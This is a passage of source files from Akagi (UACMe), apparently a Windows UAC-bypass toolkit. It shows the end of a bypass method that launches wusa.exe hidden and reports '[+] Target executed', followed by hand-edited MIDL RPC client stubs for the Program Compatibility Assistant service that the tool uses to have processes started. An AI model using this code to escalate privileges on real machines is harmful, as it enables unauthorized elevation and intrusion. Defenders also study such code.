} while (++retryCount < 10); _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot); _strcat(szBuffer, SYSWOW64_DIR); _strcat(szBuffer, WUSA_EXE); if (supRunProcess2(szBuffer, NULL, NULL, SW_HIDE, 5000)) { ucmConsolePrint(TEXT("[+] Target executed\r\n")); MethodResult = STATUS_SUCCESS; } } while (FALSE); if (OverwriteThreadHandle) { TerminateThread(OverwriteThreadHandle, 0); CloseHandle(OverwriteThreadHandle); OverwriteThreadHandle = NULL; } // // Cleanup. 
//
    if (SUCCEEDED(hr_init))
        CoUninitialize();

    return MethodResult;
}

================================================
FILE: Source/Akagi/pcasvc/w7/pcasvc7.acf
================================================
[
    explicit_handle
]
interface PcaService7
{
    RAiNotifyUserCallbackExceptionProcess();
}

================================================
FILE: Source/Akagi/pcasvc/w7/pcasvc7.idl
================================================
[
    uuid(0767a036-0d22-48aa-ba69-b619480f38cb),
    version(1.0),
]
interface PcaService7
{
    long RAiNotifyUserCallbackExceptionProcess(
        handle_t bindingHandle,
        [in][string] wchar_t* exePathName,
        [in]long unknown0,
        [in]long processId
    );
}

================================================
FILE: Source/Akagi/pcasvc/w7/x64/pcasvc7_64.c
================================================
/*
File has been edited after MIDL compiler, changes:
1. XCFG BS removed
2. Warning suppression added
3. See pcasvc7__MIDL_ProcFormatString definition "Modified" comment
*/

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038 */
/* Compiler settings for pcasvc7.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)

#pragma warning( disable: 4049 )  /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/

#include <string.h>
#include "pcasvc7_64.h"

#define TYPE_FORMAT_STRING_SIZE   7
#define PROC_FORMAT_STRING_SIZE   55
#define EXPR_FORMAT_STRING_SIZE   1
#define TRANSMIT_AS_TABLE_SIZE    0
#define WIRE_MARSHAL_TABLE_SIZE   0

typedef struct
_pcasvc7_MIDL_TYPE_FORMAT_STRING { short Pad; unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; } pcasvc7_MIDL_TYPE_FORMAT_STRING; typedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING { short Pad; unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; } pcasvc7_MIDL_PROC_FORMAT_STRING; typedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING { long Pad; unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; } pcasvc7_MIDL_EXPR_FORMAT_STRING; static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; extern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString; extern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString; extern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString; #define GENERIC_BINDING_TABLE_SIZE 0 /* Standard interface: PcaService7, ver. 1.0, GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */ static const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}}, {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 0, 0, 0, 0, 0, 0x00000000 }; RPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface; extern const MIDL_STUB_DESC PcaService7_StubDesc; static RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle; long RAiNotifyUserCallbackExceptionProcess( handle_t bindingHandle, /* [string][in] */ wchar_t *exePathName, /* [in] */ long unknown0, /* [in] */ long processId) { CLIENT_CALL_RETURN _RetVal; _RetVal = NdrClientCall2( ( PMIDL_STUB_DESC )&PcaService7_StubDesc, (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0], bindingHandle, exePathName, unknown0, processId); return ( long )_RetVal.Simple; } #if !defined(__RPC_WIN64__) #error Invalid build platform for this stub. 
#endif static const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString = { 0, { /* Procedure RAiNotifyUserCallbackExceptionProcess */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 2 */ NdrFcLong( 0x0 ), /* 0 */ /* 6 */ NdrFcShort( 0x4 ), /* 4 */ /* N.B. Modified */ /* 8 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ /* 14 */ NdrFcShort( 0x10 ), /* 16 */ /* 16 */ NdrFcShort( 0x8 ), /* 8 */ /* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ 0x4, /* 4 */ /* 20 */ 0xa, /* 10 */ 0x1, /* Ext Flags: new corr desc, */ /* 22 */ NdrFcShort( 0x0 ), /* 0 */ /* 24 */ NdrFcShort( 0x0 ), /* 0 */ /* 26 */ NdrFcShort( 0x0 ), /* 0 */ /* 28 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter exePathName */ /* 30 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 34 */ NdrFcShort( 0x4 ), /* Type Offset=4 */ /* Parameter unknown0 */ /* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 40 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter processId */ /* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 46 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Return value */ /* 48 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 52 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ 0x0 } }; static const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString = { 0, { NdrFcShort( 0x0 ), /* 0 */ /* 2 */ 0x11, 0x8, /* FC_RP [simple_pointer] */ /* 4 */ 0x25, /* FC_C_WSTRING */ 0x5c, /* FC_PAD */ 0x0 } }; static const unsigned short PcaService7_FormatStringOffsetTable[] = { 0 }; static const MIDL_STUB_DESC PcaService7_StubDesc = { (void *)& PcaService7___RpcClientInterface, 
MIDL_user_allocate,
    MIDL_user_free,
    &PcaService7__MIDL_AutoBindHandle,
    0,
    0,
    0,
    0,
    pcasvc7__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x50002, /* Ndr library version */
    0,
    0x8010272, /* MIDL Version 8.1.626 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x1, /* MIDL flag */
    0, /* cs routines */
    0,   /* proxy/server info */
    0
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

#else
#pragma warning(disable:4206)
#endif /* defined(_M_AMD64)*/

================================================
FILE: Source/Akagi/pcasvc/w7/x64/pcasvc7_64.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038 */
/* Compiler settings for pcasvc7.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#pragma warning( disable: 4049 )  /* more than 64k source lines */

/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef __pcasvc7_64_h__
#define __pcasvc7_64_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif

/* Forward Declarations */

#ifdef __cplusplus
extern "C"{
#endif

#ifndef __PcaService7_INTERFACE_DEFINED__
#define __PcaService7_INTERFACE_DEFINED__

/* interface PcaService7 */
/*
[explicit_handle][version][uuid] */

long RAiNotifyUserCallbackExceptionProcess(
    handle_t bindingHandle,
    /* [string][in] */ wchar_t *exePathName,
    /* [in] */ long unknown0,
    /* [in] */ long processId);

extern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;
#endif /* __PcaService7_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif

================================================
FILE: Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.c
================================================
/*
File has been edited after MIDL compiler, changes:
1. XCFG BS removed
2. Warning suppression added
3. See pcasvc7__MIDL_ProcFormatString definition "Modified" comment
*/

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038 */
/* Compiler settings for pcasvc7.idl:
    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)

#pragma warning( disable: 4049 )  /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/
#pragma warning( disable: 4100 )  /* unreferenced arguments in x86 call */

#pragma optimize("", off )

#include <string.h>
#include "pcasvc7_32.h"

#define TYPE_FORMAT_STRING_SIZE   7
#define PROC_FORMAT_STRING_SIZE   53
#define EXPR_FORMAT_STRING_SIZE   1
#define TRANSMIT_AS_TABLE_SIZE    0
#define WIRE_MARSHAL_TABLE_SIZE   0

typedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[
 TYPE_FORMAT_STRING_SIZE ];
    } pcasvc7_MIDL_TYPE_FORMAT_STRING;

typedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } pcasvc7_MIDL_PROC_FORMAT_STRING;

typedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } pcasvc7_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};


extern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;
extern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;
extern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;

#define GENERIC_BINDING_TABLE_SIZE   0            


/* Standard interface: PcaService7, ver. 1.0,
   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */



static const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =
    {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    0,
    0,
    0,
    0,
    0x00000000
    };
RPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;

extern const MIDL_STUB_DESC PcaService7_StubDesc;

static RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;


long RAiNotifyUserCallbackExceptionProcess( 
    handle_t bindingHandle,
    /* [string][in] */ wchar_t *exePathName,
    /* [in] */ long unknown0,
    /* [in] */ long processId)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&PcaService7_StubDesc,
                  (PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],
                  ( unsigned char * )&bindingHandle);
    return ( long  )_RetVal.Simple;
    
}


#if !defined(__RPC_WIN32__)
#error  Invalid build platform for this stub.
#endif

#if !(TARGET_IS_NT50_OR_LATER)
#error You need Windows 2000 or later to run this stub because it uses these features:
#error   /robust command line switch.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
#endif


static const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =
    {
        0,
        {

    /* Procedure RAiNotifyUserCallbackExceptionProcess */

            0x0,        /* 0 */
            0x48,       /* Old Flags:  */
/*  2 */    NdrFcLong( 0x0 ),   /* 0 */
/*  6 */    NdrFcShort( 0x4 ),  /* 4 */
/*  8 */    NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 10 */    0x32,       /* FC_BIND_PRIMITIVE */
            0x0,        /* 0 */
/* 12 */    NdrFcShort( 0x0 ),  /* x86 Stack size/offset = 0 */
/* 14 */    NdrFcShort( 0x10 ), /* 16 */
/* 16 */    NdrFcShort( 0x8 ),  /* 8 */
/* 18 */    0x46,       /* Oi2 Flags:  clt must size, has return, has ext, */
            0x4,        /* 4 */
/* 20 */    0x8,        /* 8 */
            0x1,        /* Ext Flags:  new corr desc, */
/* 22 */    NdrFcShort( 0x0 ),  /* 0 */
/* 24 */    NdrFcShort( 0x0 ),  /* 0 */
/* 26 */    NdrFcShort( 0x0 ),  /* 0 */

    /* Parameter exePathName */

/* 28 */    NdrFcShort( 0x10b ),    /* Flags:  must size, must free, in, simple ref, */
/* 30 */    NdrFcShort( 0x4 ),  /* x86 Stack size/offset = 4 */
/* 32 */    NdrFcShort( 0x4 ),  /* Type Offset=4 */

    /* Parameter unknown0 */

/* 34 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 36 */    NdrFcShort( 0x8 ),  /* x86 Stack size/offset = 8 */
/* 38 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Parameter processId */

/* 40 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 42 */    NdrFcShort( 0xc ),  /* x86 Stack size/offset = 12 */
/* 44 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Return value */

/* 46 */    NdrFcShort( 0x70 ), /* Flags:  out, return, base type, */
/* 48 */    NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 50 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

            0x0
        }
    };

static const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =
    {
        0,
        {
            NdrFcShort( 0x0 ),  /* 0 */
/*  2 */    
            0x11, 0x8,  /* FC_RP [simple_pointer] */
/*  4 */    
            0x25,       /* FC_C_WSTRING */
            0x5c,       /* FC_PAD */

            0x0
        }
    };

static const unsigned short PcaService7_FormatStringOffsetTable[] =
    {
    0
    };


static
 const MIDL_STUB_DESC PcaService7_StubDesc = 
    {
    (void *)& PcaService7___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &PcaService7__MIDL_AutoBindHandle,
    0,
    0,
    0,
    0,
    pcasvc7__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x50002, /* Ndr library version */
    0,
    0x8010272, /* MIDL Version 8.1.626 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x1,  /* MIDL flag */
    0, /* cs routines */
    0,   /* proxy/server info */
    0
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

#else
#pragma warning(disable:4206)
#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */

================================================
FILE: Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for pcasvc7.idl:
    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#pragma warning( disable: 4049 )  /* more than 64k source lines */

/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef __pcasvc7_32_h__
#define __pcasvc7_32_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif

/* Forward Declarations */ 

#ifdef __cplusplus
extern "C"{
#endif 

#ifndef __PcaService7_INTERFACE_DEFINED__
#define __PcaService7_INTERFACE_DEFINED__

/* interface PcaService7 */
/* [explicit_handle][version][uuid] */ 

long RAiNotifyUserCallbackExceptionProcess( 
    handle_t bindingHandle,
    /* [string][in] */ wchar_t *exePathName,
    /* [in] */ long unknown0,
    /* [in] */ long processId);

extern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;
#endif /* __PcaService7_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif

================================================
FILE: Source/Akagi/pcasvc/w8_10/pcasvc.acf
================================================
[
    explicit_handle
]
interface PcaService
{
    RAiMonitorProcess();
}

================================================
FILE: Source/Akagi/pcasvc/w8_10/pcasvc.idl
================================================
[
    uuid(0767a036-0d22-48aa-ba69-b619480f38cb),
    version(1.0),
]
interface PcaService
{
    long RAiMonitorProcess(
        handle_t bindingHandle,
        [in]unsigned __int3264 hProcess,
        [in]long unknown0,
        [in][unique][string]wchar_t* exeFileName,
        [in][unique][string]wchar_t* cmdLine,
        [in][unique][string]wchar_t* workingDir,
        [in]long flags
    );
}

================================================
FILE: Source/Akagi/pcasvc/w8_10/x64/pcasvc64.c
================================================
/*
   File has been edited after MIDL compiler, changes:
   1. XCFG BS removed
   2.
      Warning suppression added
*/

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for pcasvc.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#if defined(_M_AMD64)

#pragma warning( disable: 4049 )  /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif

#pragma warning( disable: 4211 )  /* redefine extern to static */
#pragma warning( disable: 4232 )  /* dllimport identity*/
#pragma warning( disable: 4024 )  /* array to pointer mapping*/

#include <string.h>

#include "pcasvc64.h"

#define TYPE_FORMAT_STRING_SIZE   7                                 
#define PROC_FORMAT_STRING_SIZE   73                                
#define EXPR_FORMAT_STRING_SIZE   1                                 
#define TRANSMIT_AS_TABLE_SIZE    0            
#define WIRE_MARSHAL_TABLE_SIZE   0            

typedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];
    } pcasvc_MIDL_TYPE_FORMAT_STRING;

typedef struct _pcasvc_MIDL_PROC_FORMAT_STRING
    {
    short          Pad;
    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];
    } pcasvc_MIDL_PROC_FORMAT_STRING;

typedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING
    {
    long          Pad;
    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];
    } pcasvc_MIDL_EXPR_FORMAT_STRING;


static const RPC_SYNTAX_IDENTIFIER  _RpcTransferSynt
ax = 
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};


extern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;
extern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;
extern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;

#define GENERIC_BINDING_TABLE_SIZE   0            


/* Standard interface: PcaService, ver.
 1.0,
   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */



static const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =
    {
    sizeof(RPC_CLIENT_INTERFACE),
    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
    0,
    0,
    0,
    0,
    0,
    0x00000000
    };
RPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;

extern const MIDL_STUB_DESC PcaService_StubDesc;

static RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;


long RAiMonitorProcess( 
    handle_t bindingHandle,
    /* [in] */ unsigned __int3264 hProcess,
    /* [in] */ long unknown0,
    /* [string][unique][in] */ wchar_t *exeFileName,
    /* [string][unique][in] */ wchar_t *cmdLine,
    /* [string][unique][in] */ wchar_t *workingDir,
    /* [in] */ long flags)
{

    CLIENT_CALL_RETURN _RetVal;

    _RetVal = NdrClientCall2(
                  ( PMIDL_STUB_DESC  )&PcaService_StubDesc,
                  (PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],
                  bindingHandle,
                  hProcess,
                  unknown0,
                  exeFileName,
                  cmdLine,
                  workingDir,
                  flags);
    return ( long  )_RetVal.Simple;
    
}


#if !defined(__RPC_WIN64__)
#error  Invalid build platform for this stub.
#endif


static const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =
    {
        0,
        {

    /* Procedure RAiMonitorProcess */

            0x0,        /* 0 */
            0x48,       /* Old Flags:  */
/*  2 */    NdrFcLong( 0x0 ),   /* 0 */
/*  6 */    NdrFcShort( 0x0 ),  /* 0 */
/*  8 */    NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */
/* 10 */    0x32,       /* FC_BIND_PRIMITIVE */
            0x0,        /* 0 */
/* 12 */    NdrFcShort( 0x0 ),  /* X64 Stack size/offset = 0 */
/* 14 */    NdrFcShort( 0x18 ), /* 24 */
/* 16 */    NdrFcShort( 0x8 ),  /* 8 */
/* 18 */    0x46,       /* Oi2 Flags:  clt must size, has return, has ext, */
            0x7,        /* 7 */
/* 20 */    0xa,        /* 10 */
            0x1,        /* Ext Flags:  new corr desc, */
/* 22 */    NdrFcShort( 0x0 ),  /* 0 */
/* 24 */    NdrFcShort( 0x0 ),  /* 0 */
/* 26 */    NdrFcShort( 0x0 ),  /* 0 */
/* 28 */    NdrFcShort( 0x0 ),  /* 0 */

    /* Parameter hProcess */

/* 30 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 32 */    NdrFcShort( 0x8 ),  /* X64 Stack size/offset = 8 */
/* 34 */    0xb9,       /* FC_UINT3264 */
            0x0,        /* 0 */

    /* Parameter unknown0 */

/* 36 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 38 */    NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Parameter exeFileName */

/* 42 */    NdrFcShort( 0xb ),  /* Flags:  must size, must free, in, */
/* 44 */    NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */    NdrFcShort( 0x2 ),  /* Type Offset=2 */

    /* Parameter cmdLine */

/* 48 */    NdrFcShort( 0xb ),  /* Flags:  must size, must free, in, */
/* 50 */    NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */    NdrFcShort( 0x2 ),  /* Type Offset=2 */

    /* Parameter workingDir */

/* 54 */    NdrFcShort( 0xb ),  /* Flags:  must size, must free, in, */
/* 56 */    NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 58 */    NdrFcShort( 0x2 ),  /* Type Offset=2 */

    /* Parameter flags */

/* 60 */    NdrFcShort( 0x48 ), /* Flags:  in, base type, */
/* 62 */    NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */
/* 64 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

    /* Return value */

/* 66 */    NdrFcShort( 0x70 ), /* Flags:  out, return,
 base type, */
/* 68 */    NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */
/* 70 */    0x8,        /* FC_LONG */
            0x0,        /* 0 */

            0x0
        }
    };

static const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =
    {
        0,
        {
            NdrFcShort( 0x0 ),  /* 0 */
/*  2 */    
            0x12, 0x8,  /* FC_UP [simple_pointer] */
/*  4 */    
            0x25,       /* FC_C_WSTRING */
            0x5c,       /* FC_PAD */

            0x0
        }
    };

static const unsigned short PcaService_FormatStringOffsetTable[] =
    {
    0
    };


static const MIDL_STUB_DESC PcaService_StubDesc = 
    {
    (void *)& PcaService___RpcClientInterface,
    MIDL_user_allocate,
    MIDL_user_free,
    &PcaService__MIDL_AutoBindHandle,
    0,
    0,
    0,
    0,
    pcasvc__MIDL_TypeFormatString.Format,
    1, /* -error bounds_check flag */
    0x50002, /* Ndr library version */
    0,
    0x8010272, /* MIDL Version 8.1.626 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x1,  /* MIDL flag */
    0, /* cs routines */
    0,   /* proxy/server info */
    0
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

#else
#pragma warning(disable:4206)
#endif /* defined(_M_AMD64)*/

================================================
FILE: Source/Akagi/pcasvc/w8_10/x64/pcasvc64.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */

/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
 */
/* Compiler settings for pcasvc.idl:
    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data 
    VC __declspec() decoration level: 
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING(  ) */

#pragma warning( disable: 4049 )  /* more than 64k source lines */

/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /*
 __RPCNDR_H_VERSION__ */

#ifndef __pcasvc64_h__
#define __pcasvc64_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
